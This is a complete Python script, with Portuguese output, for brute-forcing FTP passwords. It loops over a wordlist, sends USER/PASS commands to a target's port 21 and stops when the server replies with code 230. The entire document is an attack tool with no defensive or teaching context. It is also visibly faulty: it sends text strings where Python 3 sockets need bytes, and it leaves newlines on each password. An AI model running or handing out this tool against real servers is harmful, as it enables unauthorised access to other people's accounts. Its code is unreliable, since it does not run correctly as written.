#!/usr/bin/python3

import socket,sys,re

if len(sys.argv) != 3:
        print("[+] Modo de uso: brute_ftp <IP> <User>")
        sys.exit()

target = sys.argv[1]

usuario = sys.argv[2]

f = open('lista.txt')

for palavra in f.readlines():

        print("Realizando brute force ftp:",usuario, palavra)

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target,21))
        s.recv(1024)

        s.send("USER "+usuario+"\r\n")
        s.recv(1024)
        s.send("PASS "+palavra+"\r\n")
        resposta = s.recv(1024)
        print(resposta)
        s.send("QUIT\r\n")


        if re.search('230', resposta.decode()):

                print("[+] SENHA ENCONTRADA ---->", palavra)
                break
